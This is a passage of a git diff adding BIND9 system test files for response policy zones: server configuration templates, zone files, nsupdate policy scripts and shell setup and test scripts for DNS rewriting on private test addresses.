copyright ownership. + +; RPZ test +; This basic file is copied to several zone files before being used. +; Its contents are also changed with nsupdate + + +$TTL 300 +@ SOA manual-update-rpz. hostmaster.ns.manual-rpz-update. ( 1 3600 1200 604800 60 ) + NS ns.tld3. + +walled.tld2.manual-update-rpz. 300 A 10.0.0.1 diff --git a/bin/tests/system/rpz/ns8/named.conf.in b/bin/tests/system/rpz/ns8/named.conf.in new file mode 100644 index 0000000..f228c00 --- /dev/null +++ b/bin/tests/system/rpz/ns8/named.conf.in @@ -0,0 +1,66 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +/* + * Main rpz test DNS server. + */ + +options { + query-source address 10.53.0.8; + notify-source 10.53.0.8; + transfer-source 10.53.0.8; + port @PORT@; + pid-file "named.pid"; + statistics-file "named.stats"; + session-keyfile "session.key"; + listen-on { 10.53.0.8; }; + listen-on-v6 { none; }; + notify yes; + minimal-responses no; + recursion yes; + dnssec-validation yes; + + response-policy { + zone "manual-update-rpz"; + } + // add-soa yes // do not set testing default mode + min-ns-dots 0 + qname-wait-recurse yes + min-update-interval 0 + nsdname-enable yes + nsip-enable yes + ; + + include "../dnsrps.conf"; + also-notify { 10.53.0.8 port @EXTRAPORT1@; }; + notify-delay 0; +}; + +logging { category rpz { default_debug; }; }; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; +controls { + inet 10.53.0.8 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + + +zone "." { type hint; file "hints"; }; + +zone "manual-update-rpz." { + type primary; + file "manual-update-rpz.db"; + notify no; +}; diff --git a/bin/tests/system/rpz/ns9/hints b/bin/tests/system/rpz/ns9/hints new file mode 100644 index 0000000..b657c39 --- /dev/null +++ b/bin/tests/system/rpz/ns9/hints @@ -0,0 +1,13 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +. 120 NS ns. +ns. 120 A 10.53.0.1 diff --git a/bin/tests/system/rpz/ns9/named.conf.in b/bin/tests/system/rpz/ns9/named.conf.in new file mode 100644 index 0000000..e57591c --- /dev/null +++ b/bin/tests/system/rpz/ns9/named.conf.in @@ -0,0 +1,60 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +/* + * DNS64 / RPZ server. + */ + +options { + query-source address 10.53.0.9; + notify-source 10.53.0.9; + transfer-source 10.53.0.9; + port @PORT@; + pid-file "named.pid"; + statistics-file "named.stats"; + session-keyfile "session.key"; + listen-on { 10.53.0.9; }; + listen-on-v6 { none; }; + notify yes; + minimal-responses no; + recursion yes; + dnssec-validation yes; + dns64-server "example.localdomain."; + dns64 64:ff9b::/96 { }; + response-policy { + zone "rpz"; + } + qname-wait-recurse no ; + + include "../dnsrps.conf"; + notify-delay 0; +}; + +logging { category rpz { default_debug; }; }; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; +controls { + inet 10.53.0.9 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + + +zone "." { type hint; file "hints"; }; + +zone "rpz." { + type primary; + file "rpz.db"; + notify no; +}; diff --git a/bin/tests/system/rpz/ns9/rpz.db b/bin/tests/system/rpz/ns9/rpz.db new file mode 100644 index 0000000..dcbe5d6 --- /dev/null +++ b/bin/tests/system/rpz/ns9/rpz.db @@ -0,0 +1,16 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +rpz. 28800 IN SOA rpz. hostmaster.rpz. 6 10800 3600 2419200 900 +rpz. 28800 IN NS . +a-only.example.rpz. 28800 IN CNAME *. +no-a-no-aaaa.example.rpz. 28800 IN CNAME *. +a-plus-aaaa.example.rpz. 28800 IN CNAME *. diff --git a/bin/tests/system/rpz/qperf.sh b/bin/tests/system/rpz/qperf.sh new file mode 100644 index 0000000..dc79de9 --- /dev/null +++ b/bin/tests/system/rpz/qperf.sh @@ -0,0 +1,22 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +for QDIR in `echo "$PATH" | tr : ' '` ../../../../contrib/queryperf; do + QPERF=$QDIR/queryperf + if test -f "$QPERF" -a -x "$QPERF"; then + echo $QPERF + exit 0 + fi +done + +exit 0 diff --git a/bin/tests/system/rpz/setup.sh b/bin/tests/system/rpz/setup.sh new file mode 100644 index 0000000..10ab738 --- /dev/null +++ b/bin/tests/system/rpz/setup.sh @@ -0,0 +1,180 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# touch dnsrps-off to not test with DNSRPS + +set -e + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +QPERF=$($SHELL qperf.sh) + +USAGE="$0: [-DNx]" +DEBUG= +while getopts "DNx" c; do + case $c in + x) set -x; DEBUG=-x ;; + D) TEST_DNSRPS="-D" ;; + N) PARTIAL=-P ;; + *) echo "$USAGE" 1>&2; exit 1 ;; + esac +done +shift $((OPTIND - 1)) +if test "$#" -ne 0; then + echo "$USAGE" 1>&2 + exit 1 +fi + +if [ ${NOCLEAN:-unset} = unset ]; then + $SHELL clean.sh $PARTIAL $DEBUG +fi + +for dir in ns*; do + touch $dir/named.run + nextpart $dir/named.run > /dev/null +done + +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns2/named.conf.in ns2/named.conf +copy_setports ns3/named.conf.in ns3/named.conf +copy_setports ns4/named.conf.in ns4/named.conf +copy_setports ns5/named.conf.in ns5/named.conf +copy_setports ns6/named.conf.in ns6/named.conf +copy_setports ns7/named.conf.in ns7/named.conf +copy_setports ns8/named.conf.in ns8/named.conf +copy_setports ns9/named.conf.in ns9/named.conf +copy_setports ns10/named.conf.in ns10/named.conf + +copy_setports dnsrpzd.conf.in dnsrpzd.conf + +# decide whether to test DNSRPS +# Note that dnsrps.conf and dnsrps-slave.conf are included in named.conf +# and differ from dnsrpz.conf which is used by dnsrpzd. +$SHELL ../ckdnsrps.sh -A $TEST_DNSRPS $DEBUG +test -z "$(grep 'dnsrps-enable yes' dnsrps.conf)" && TEST_DNSRPS= + +# set up test policy zones. +# bl is the main test zone +# bl-2 is used to check competing zones. +# bl-{given,disabled,passthru,no-data,nxdomain,cname,wildcard,garden, +# drop,tcp-only} are used to check policy overrides in named.conf. +# NO-OP is an obsolete synonym for PASSHTRU +for NM in '' -2 -given -disabled -passthru -no-op -nodata -nxdomain -cname -wildcname -garden -drop -tcp-only; do + sed -e "/SOA/s/blx/bl$NM/g" ns3/base.db >ns3/bl$NM.db +done +# bl zones are dynamically updated. Add one zone that is updated manually. +cp ns3/manual-update-rpz.db.in ns3/manual-update-rpz.db +cp ns8/manual-update-rpz.db.in ns8/manual-update-rpz.db + +cp ns3/mixed-case-rpz-1.db.in ns3/mixed-case-rpz.db + +# a zone that expires quickly and then can't be refreshed +cp ns5/fast-expire.db.in ns5/fast-expire.db +cp ns5/expire.conf.in ns5/expire.conf + +# $1=directory +# $2=domain name +# $3=input zone file +# $4=output file +signzone () { + KEYNAME=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -K $1 $2) + cat $1/$3 $1/$KEYNAME.key > $1/tmp + $SIGNER -P -K $1 -o $2 -f $1/$4 $1/tmp >/dev/null + sed -n -e 's/\(.*\) IN DNSKEY \([0-9]\{1,\} [0-9]\{1,\} [0-9]\{1,\}\) \(.*\)/trust-anchors {"\1" static-key \2 "\3";};/p' $1/$KEYNAME.key >>trusted.conf + DSFILENAME=dsset-${2}${TP} + rm $DSFILENAME $1/tmp +} +signzone ns2 tld2s base-tld2s.db tld2s.db + +# Performance and a few other checks. +cat <<EOF >ns5/rpz-switch +response-policy { + zone "bl0"; zone "bl1"; zone "bl2"; zone "bl3"; zone "bl4"; + zone "bl5"; zone "bl6"; zone "bl7"; zone "bl8"; zone "bl9"; + zone "bl10"; zone "bl11"; zone "bl12"; zone "bl13"; zone "bl14"; + zone "bl15"; zone "bl16"; zone "bl17"; zone "bl18"; zone "bl19"; + } recursive-only no + qname-wait-recurse no + nsip-enable yes + nsdname-enable yes + max-policy-ttl 90 + break-dnssec yes + ; +EOF + +cat <<EOF >ns5/example.db +\$TTL 300 +@ SOA . hostmaster.ns.example.tld5. ( 1 3600 1200 604800 60 ) + NS ns + NS ns1 +ns A 10.53.0.5 +ns1 A 10.53.0.5 +EOF + +cat <<EOF >ns5/bl.db +\$TTL 300 +@ SOA . hostmaster.ns.blperf. ( 1 3600 1200 604800 60 ) + NS ns.tld5. + +; for "qname-wait-recurse no" in #35 test1 +x.servfail A 35.35.35.35 +; for "recursive-only no" in #8 test5 +a3-5.tld2 CNAME . +; for "break-dnssec" in #9 & #10 test5 +a3-5.tld2s CNAME . +; for "max-policy-ttl 90" in #17 test5 +a3-17.tld2 500 A 17.17.17.17 + +; dummy NSDNAME policy to trigger lookups +ns1.x.rpz-nsdname CNAME . +EOF + +if test -n "$QPERF"; then + # Do not build the full zones if we will not use them. + $PERL -e 'for ($val = 1; $val <= 65535; ++$val) { + printf("host-%05d\tA 192.168.%d.%d\n", $val, $val/256, $val%256); + }' >>ns5/example.db + + echo >>ns5/bl.db + echo "; rewrite some names" >>ns5/bl.db + $PERL -e 'for ($val = 2; $val <= 65535; $val += 69) { + printf("host-%05d.example.tld5\tCNAME\t.\n", $val); + }' >>ns5/bl.db + + echo >>ns5/bl.db + echo "; rewrite with some not entirely trivial patricia trees" >>ns5/bl.db + $PERL -e 'for ($val = 3; $val <= 65535; $val += 69) { + printf("32.%d.%d.168.192.rpz-ip \tCNAME\t.\n", + $val%256, $val/256); + }' >>ns5/bl.db +fi + +# some psuedo-random queryperf requests +$PERL -e 'for ($cnt = $val = 1; $cnt <= 3000; ++$cnt) { + printf("host-%05d.example.tld5 A\n", $val); + $val = ($val * 9 + 32771) % 65536; + }' >ns5/requests + +cp ns2/bl.tld2.db.in ns2/bl.tld2.db +cp ns5/empty.db.in ns5/empty.db +cp ns5/empty.db.in ns5/policy2.db +cp ns6/bl.tld2s.db.in ns6/bl.tld2s.db + +# Run dnsrpzd to get the license and prime the static policy zones +if test -n "$TEST_DNSRPS"; then + DNSRPZD="$(../rpz/dnsrps -p)" + cd ns3 + "$DNSRPZ" -D../dnsrpzd.rpzf -S../dnsrpzd.sock -C../dnsrpzd.conf \ + -w 0 -dddd -L stdout >./dnsrpzd.run 2>&1 +fi diff --git a/bin/tests/system/rpz/test1 b/bin/tests/system/rpz/test1 new file mode 100644 index 0000000..3dc0375 --- /dev/null +++ b/bin/tests/system/rpz/test1 @@ -0,0 +1,99 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + + + + +; Use comment lines instead of blank lines to combine update requests into +; single requests +; Separate update requests for distinct TLDs with blank lines or 'send' +; End the file with a blank line or 'send' + +server 10.53.0.3 @PORT@ + +; QNAME tests + +; NXDOMAIN +; 2, 25 +update add a0-1.tld2.bl. 300 CNAME . +; NODATA +; 3 +update add a3-1.tld2.bl. 300 CNAME *. +; and no assert-botch +; 4, 5 +update add a3-2.tld2.bl. 300 DNAME example.com. +; +; NXDOMAIN for a4-2-cname.tld2 via its target a4-2.tld2. +; 6 and 7 +update add a4-2.tld2.bl 300 CNAME . +; 8 +; NODATA for a4-3-cname.tld2 via its target a4-3.tld2. +update add a4-3.tld2.bl 300 CNAME *. +; +; replace the A for a4-1.sub1.tld2 with 12.12.12.12 +; 9 +update add a4-1.sub1.tld2.bl. 300 A 12.12.12.12 +; +; replace the A for *.sub2.tld2 with 12.12.12.12 +; 10 +update add a4-1.sub2.tld2.bl. 300 A 12.12.12.12 +; +; replace NXDOMAIN for {nxc1,nxc2}.sub1.tld2 with 12.12.12.12 using CNAMEs +; 11 +update add nxc1.sub1.tld2.bl. 300 CNAME a12.tld2. +; 12 +update add nxc2.sub1.tld2.bl. 300 CNAME a12-cname.tld2. +; +; prefer the first conflicting zone +; 13 +update add a4-4.tld2.bl. 300 A 127.4.4.1 +update add a6-1.tld2.bl. 300 CNAME a6-1.tld2. +update add a6-2.tld2.bl. 300 A 127.6.2.1 +update add a6-1.tld2.bl. 300 A 127.6.1.1 +update add a6-2.tld2.bl. 300 CNAME a6-2.tld2. +send +update add a4-4.tld2.bl-2. 300 A 127.4.4.2 +send + +; wildcard CNAME +; 16 +update add a3-6.tld2.bl. 300 CNAME *.tld4. +; 17 +update add *.sub1.tld2.bl. 300 CNAME *.tld4. +; CNAME chain +; 18 +update add a4-5.tld2.bl. 300 A 127.0.0.16 +; stop at first hit in CNAME chain +; 19 +update add a4-6.tld2.bl. 300 CNAME . +update add a4-6-cname.tld2.bl. 300 A 127.0.0.17 +; no change instead of NXDOMAIN because +norecurse +; 20 +update add a5-2.tld2.bl. 300 CNAME . +; no change instead of NODATA because +norecurse +; 21 +update add a5-3.tld2.bl. 300 CNAME *. +; 22, 23 +update add a5-4.tld2.bl. 300 DNAME example.com. +; +; assert in rbtdb.c +; 24 +update add c1.crash2.tld3.bl. 300 CNAME . +; DO=1 without signatures, DO=0 with signatures are rewritten +; 26 - 27 +update add a0-1.tld2s.bl. 300 CNAME . +; 32 +update add a3-8.tld2.bl. 300 CNAME rpz-drop. +; 33 +update add a3-9.tld2.bl. 300 CNAME rpz-tcp-only. +; 34 qname-wait-recurse yes +update add x.servfail.bl. 300 A 127.0.0.34 +send diff --git a/bin/tests/system/rpz/test2 b/bin/tests/system/rpz/test2 new file mode 100644 index 0000000..ad71e3a --- /dev/null +++ b/bin/tests/system/rpz/test2 @@ -0,0 +1,77 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + + + + +; Use comment lines instead of blank lines to combine update requests into +; single requests +; Separate update requests for distinct TLDs with blank lines or 'send' +; End the file with a blank line or 'send' +; CNAME targets are absolute even without trailing "." + +; IP tests + +server 10.53.0.3 @PORT@ + +; NODATA a3-1.tld2 +; 1 +update add 32.1.3.168.192.rpz-ip.bl 300 CNAME *. +; +; NXDOMAIN for 192.168.4.0/24, the network of a4-1.tld2 and a4-2.tld2 +; 4 +update add 24.0.4.168.192.rpz-ip.bl 300 CNAME . +; +; old passthru in NXDOMAIN CIDR block to leave a4-1.tld2 unchanged +; 3 +update add 32.1.4.168.192.rpz-ip.bl 300 CNAME 32.1.4.168.192 +; +; NODATA for a4-3.tld2 +; 8 +update add 32.3.4.168.192.rpz-ip.bl 300 CNAME *. +; +; NXDOMAIN for IPv6 a3-1.tld2 +; 9 +update add 128.1.zz.3.2.2001.rpz-ip.bl 300 CNAME . +; +; apply the policy with the lexically smaller trigger address of 192.168.5.1 +; to an RRset of more than one A RR +; 11 +update add 32.1.5.168.192.rpz-ip.bl 300 A 127.0.0.1 +update add 32.2.5.168.192.rpz-ip.bl 300 A 127.0.0.2 +; +; prefer first conflicting IP zone for a5-3.tld2 +; 12 +update add 32.3.5.168.192.rpz-ip.bl 300 A 127.0.0.1 +send +update add 32.3.5.168.192.rpz-ip.bl-2 300 A 127.0.0.2 +send + +; prefer QNAME to IP for a5-4.tld2 +; 13, 14 +update add 32.4.5.168.192.rpz-ip.bl 300 CNAME a12.tld2. +update add a5-4.tld2.bl 300 CNAME a14.tld4. +; +; poke hole in NXDOMAIN CIDR block to leave a4-4.tld2 unchanged +; 15 +update add 32.4.4.168.192.rpz-ip.bl 300 CNAME rpz-passthru. +; +; assert in rbtdb.c +; 16 +update add 32.16.1.16.172.rpz-ip.bl 300 CNAME . +send +update add c2.crash2.tld3.bl-2 300 A 127.0.0.16 +send + +; client-IP address trigger +; 17 +update add 32.1.0.53.10.rpz-client-ip.bl 300 A 127.0.0.17 +send diff --git a/bin/tests/system/rpz/test3 b/bin/tests/system/rpz/test3 new file mode 100644 index 0000000..222b757 --- /dev/null +++ b/bin/tests/system/rpz/test3 @@ -0,0 +1,47 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + + + +; Use comment lines instead of blank lines to combine update requests into +; single requests +; Separate update requests for distinct TLDs with blank lines or 'send' +; End the file with a blank line or 'send' + +; NSDNAME tests + +server 10.53.0.3 @PORT@ + +; 3, 4, 5 +; NXDOMAIN for *.sub1.tld2 by NSDNAME +update add *.sub1.tld2.rpz-nsdname.bl. 300 CNAME . +; +; 6 +; walled garden for *.sub2.tld2 +update add *.sub2.tld2.rpz-nsdname.bl. 300 CNAME a12-cname.tld2. +; +; 7, 8 +; exempt a3-2.tld2 and anything in 192.168.0.0/24 +; also checks that IP policies are preferred over NSDNAME policies +update add a3-2.tld2.bl 300 CNAME a3-2.tld2. +update add 24.0.0.168.192.rpz-ip.bl 300 CNAME 24.0.0.168.192. +; +; 9 +; prefer QNAME policy to NSDNAME policy +update add a4-1.tld2.bl. 300 A 12.12.12.12 +; 10 +; prefer policy for largest NS name +update add ns.sub3.tld2.rpz-nsdname.bl. 300 A 127.0.0.1 +update add ns.subsub.sub3.tld2.rpz-nsdname.bl. 300 A 127.0.0.2 + +; ip-as-qname rewrites all of tld5 +update add ns.tld5.bl. 300 A 12.12.12.12 +send diff --git a/bin/tests/system/rpz/test4 b/bin/tests/system/rpz/test4 new file mode 100644 index 0000000..7b95dd3 --- /dev/null +++ b/bin/tests/system/rpz/test4 @@ -0,0 +1,36 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + + + +; Use comment lines instead of blank lines to combine update requests into +; single requests +; Separate update requests for distinct TLDs with blank lines or 'send' +; End the file with a blank line or 'send' + +; NSIP tests + +server 10.53.0.3 @PORT@ + +; NXDOMAIN for all of tld2 based on its server IP address +update add 32.2.0.53.10.rpz-nsip.bl. 300 CNAME . +; +; exempt a3-2.tld2 and anything in 192.168.0.0/24 +; also checks that IP policies are preferred over NSIP policies +update add a3-2.tld2.bl 300 CNAME a3-2.tld2. +update add 24.0.0.168.192.rpz-ip.bl 300 CNAME 24.0.0.168.192. +; +; prefer NSIP policy to NSDNAME policy +update add ns.tld2.rpz-nsdname.bl. 300 CNAME 10.0.0.1 + +; ip-as-ns rewrites all of tld5 +update add 32.5.0.53.10.rpz-ip.bl. 300 A 12.12.12.12 +send diff --git a/bin/tests/system/rpz/test4a b/bin/tests/system/rpz/test4a new file mode 100644 index 0000000..83a175d --- /dev/null +++ b/bin/tests/system/rpz/test4a @@ -0,0 +1,27 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + + + +; Use comment lines instead of blank lines to combine update requests into +; single requests +; Separate update requests for distinct TLDs with blank lines or 'send' +; End the file with a blank line or 'send' + +; walled-garden NSIP tests + +server 10.53.0.3 @PORT@ + +; rewrite all of tld2 based on its server IP address +update add 32.2.0.53.10.rpz-nsip.bl. 300 A 41.41.41.41 +update add 32.2.0.53.10.rpz-nsip.bl. 300 AAAA 2041::41 +update add 32.2.0.53.10.rpz-nsip.bl. 300 TXT "NSIP walled garden" +send diff --git a/bin/tests/system/rpz/test5 b/bin/tests/system/rpz/test5 new file mode 100644 index 0000000..f30a6be --- /dev/null +++ b/bin/tests/system/rpz/test5 @@ -0,0 +1,60 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + + + +; Use comment lines instead of blank lines to combine update requests into +; single requests +; Separate update requests for distinct TLDs with blank lines or 'send' +; End the file with a blank line or 'send' + +; the policies or replacements specified in ns3/named.conf override these + +server 10.53.0.3 @PORT@ + +; 1 +update add a3-1.tld2.bl-given. 300 A 127.0.0.1 +send +; 2 +update add a3-2.tld2.bl-passthru. 300 A 127.0.0.2 +send +; 3 +update add a3-3.tld2.bl-no-op. 300 A 127.0.0.3 +send +; 4 +update add a3-4.tld2.bl-disabled. 300 A 127.0.0.4 +send +; 5 - 7 +update add a3-5.tld2.bl-nodata. 300 A 127.0.0.5 +send +; 11 +update add a3-6.tld2.bl-nxdomain. 300 A 127.0.0.11 +send +; 12 +update add a3-7.tld2.bl-cname. 300 A 127.0.0.12 +send +; 13 +update add a3-8.tld2.bl-wildcname. 300 A 127.0.0.13 +; 14 +update add *.sub9.tld2.bl-wildcname. 300 A 127.0.1.14 +send +; 15 +update add a3-15.tld2.bl-garden. 300 A 127.0.0.15 +send +; 16 +update add a3-16.tld2.bl. 300 A 127.0.0.16 +send +; 18 +update add a3-18.tld2.bl-drop. 300 A 127.0.0.18 +send +; 19 +update add a3-19.tld2.bl-tcp-only. 300 A 127.0.0.19 +send diff --git a/bin/tests/system/rpz/test6 b/bin/tests/system/rpz/test6 new file mode 100644 index 0000000..e5c2381 --- /dev/null +++ b/bin/tests/system/rpz/test6 @@ -0,0 +1,37 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + + + +; Use comment lines instead of blank lines to combine update requests into +; single requests +; Separate update requests for distinct TLDs with blank lines or 'send' +; End the file with a blank line or 'send' + +server 10.53.0.3 @PORT@ + +; Poke the radix tree a little. +update add 128.1111.2222.3333.4444.5555.6666.7777.8888.rpz-ip.bl. 300 CNAME . +update add 128.1111.2222.3333.4444.5555.6666.zz.rpz-ip.bl. 300 CNAME . +update add 128.1111.2222.3333.4444.5555.zz.8888.rpz-ip.bl. 300 CNAME . +update add 128.1111.2222.3333.4444.zz.8888.rpz-ip.bl. 300 CNAME . +update add 128.zz.3333.4444.0.0.8888.rpz-ip.bl. 300 CNAME . +update add 128.zz.3333.4444.0.7777.8888.rpz-ip.bl. 300 CNAME . +update add 128.zz.3333.4444.0.8777.8888.rpz-ip.bl. 300 CNAME . +update add 127.zz.3333.4444.0.8777.8888.rpz-ip.bl. 300 CNAME . +; +; +; regression testing for some old crashes +update add redirect.bl. 300 A 127.0.0.1 +update add *.redirect.bl. 300 A 127.0.0.1 +update add *.credirect.bl. 300 CNAME google.com. +; +send diff --git a/bin/tests/system/rpz/tests.sh b/bin/tests/system/rpz/tests.sh new file mode 100644 index 0000000..738df3c --- /dev/null +++ b/bin/tests/system/rpz/tests.sh @@ -0,0 +1,1012 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# test response policy zones (RPZ) + +# touch dnsrps-off to not test with DNSRPS +# touch dnsrps-only to not test with classic RPZ + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +ns=10.53.0 +ns1=$ns.1 # root, defining the others +ns2=$ns.2 # authoritative server whose records are rewritten +ns3=$ns.3 # main rewriting resolver +ns4=$ns.4 # another authoritative server that is rewritten +ns5=$ns.5 # another rewriting resolver +ns6=$ns.6 # a forwarding server +ns7=$ns.7 # another rewriting resolver +ns8=$ns.8 # another rewriting resolver +ns9=$ns.9 # another rewriting resolver +ns10=$ns.10 # authoritative server + +HAVE_CORE= + +status=0 +t=0 + +DEBUG= +SAVE_RESULTS= +ARGS= + +USAGE="$0: [-xS]" +while getopts "xS:" c; do + case $c in + x) set -x; DEBUG=-x; ARGS="$ARGS -x";; + S) SAVE_RESULTS=-S; ARGS="$ARGS -S";; + *) echo "$USAGE" 1>&2; exit 1;; + esac +done +shift `expr $OPTIND - 1 || true` +if test "$#" -ne 0; then + echo "$USAGE" 1>&2 + exit 1 +fi +# really quit on control-C +trap 'exit 1' 1 2 15 + +TS='%H:%M:%S ' +TS= +comment () { + if test -n "$TS"; then + date "+${TS}$*" | cat_i + fi +} + +DNSRPSCMD=./dnsrps +RNDCCMD="$RNDC -c $SYSTEMTESTTOP/common/rndc.conf -p ${CONTROLPORT} -s" + +if test -x "$DNSRPSCMD"; then + # speed up the many delays for dnsrpzd by waiting only 0.1 seconds + WAIT_CMD="$DNSRPSCMD -w 0.1" + TEN_SECS=100 +else + WAIT_CMD="sleep 1" + TEN_SECS=10 +fi + +digcmd () { + if test "$1" = TCP; then + shift + fi + # Default to +noauth and @$ns3 + # Also default to -bX where X is the @value so that OS X will choose + # the right IP source address. + digcmd_args=`echo "+nocookie +noadd +time=2 +tries=1 -p ${PORT} $*" | \ + sed -e "/@/!s/.*/& @$ns3/" \ + -e '/-b/!s/@\([^ ]*\)/@\1 -b\1/' \ + -e '/+n?o?auth/!s/.*/+noauth &/'` + #echo_i "dig $digcmd_args 1>&2 + $DIG $digcmd_args +} + +# set DIGNM=file name for dig output +GROUP_NM= +TEST_NUM=0 +make_dignm () { + TEST_NUM=`expr $TEST_NUM : '\([0-9]*\).*'` # trim '+' characters + TEST_NUM=`expr $TEST_NUM + 1` + DIGNM=dig.out$GROUP_NM-$TEST_NUM + while test -f $DIGNM; do + TEST_NUM="$TEST_NUM+" + DIGNM=dig.out$GROUP_NM-$TEST_NUM + done +} + +setret () { + ret=1 + status=`expr $status + 1` + echo_i "$*" +} + +# set $SN to the SOA serial number of a zone +# $1=domain +# $2=DNS server and client IP address +get_sn() { + SOA=`$DIG -p ${PORT} +short +norecurse soa "$1" "@$2" "-b$2"` + SN=`expr "$SOA" : '[^ ]* [^ ]* \([^ ]*\) .*'` + test "$SN" != "" && return + echo_i "no serial number from \`dig -p ${PORT} soa $1 @$2\` in \"$SOA\"" + exit 1 +} + +get_sn_fast () { + RSN=`$DNSRPSCMD -n "$1"` + #echo "dnsrps serial for $1 is $RSN" + if test -z "$RSN"; then + echo_i "dnsrps failed to get SOA serial number for $1" + exit 1 + fi +} + +# check that dnsrpzd has loaded its zones +# $1=domain +# $2=DNS server IP address +FZONES=`sed -n -e 's/^zone "\(.*\)".*\(10.53.0..\).*/Z=\1;M=\2/p' dnsrpzd.conf` +dnsrps_loaded() { + test "$mode" = dnsrps || return + n=0 + for V in $FZONES; do + eval "$V" + get_sn $Z $M + while true; do + get_sn_fast "$Z" + if test "$SN" -eq "0$RSN"; then + #echo "$Z @$M serial=$SN" + break + fi + n=`expr $n + 1` + if test "$n" -gt $TEN_SECS; then + echo_i "dnsrps serial for $Z is $RSN instead of $SN" + exit 1 + fi + $WAIT_CMD + done + done +} + +# check the serial number in an SOA to ensure that a policy zone has +# been (re)loaded +# $1=serial number +# $2=domain +# $3=DNS server +ck_soa() { + n=0 + while true; do + if test "$mode" = dnsrps; then + get_sn_fast "$2" + test "$RSN" 